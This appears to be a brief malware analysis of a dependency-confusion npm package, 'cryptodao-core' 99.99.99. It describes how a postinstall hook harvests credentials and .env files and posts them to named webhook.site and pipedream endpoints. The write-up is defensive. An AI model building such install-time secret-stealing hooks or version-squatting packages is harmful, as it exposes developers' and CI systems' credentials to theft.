package.json declares a postinstall hook that runs recon.js on every npm install. recon.js harvests installer-side secrets — AWS_SECRET_ACCESS_KEY, SSH_PRIVATE_KEY, NPM_TOKEN, GITLAB_ACCESS_TOKEN, DB_PASSWORD, MNEMONIC and similar — reads.env files from multiple paths, enumerates CI runner directories (/builds/, /home/gitlab-runner/), and collects host fingerprint data (hostname, platform, user, cwd). The bundle is POSTed over HTTPS with TLS verification disabled (rejectUnauthorized:false) to two anonymous request-capture endpoints: webhook.site/d6d18927-e513-4df7-b019-58bfc64fe0dd and enqoojbegdvxj.x.pipedream.net. A copy is also dropped to /tmp/.npm_recon_.json. The package name 'cryptodao-core' combined with version 99.99.99 and the in-source comment 'CryptoDAO Dependency Confusion Reconnaissance Payload' is the canonical dependency-confusion attack shape — published at an absurd version to outrank an internal package of the same name on resolvers that mix public and private registries. Any CI runner or developer machine that installs this version will leak its environment secrets to attacker-controlled endpoints.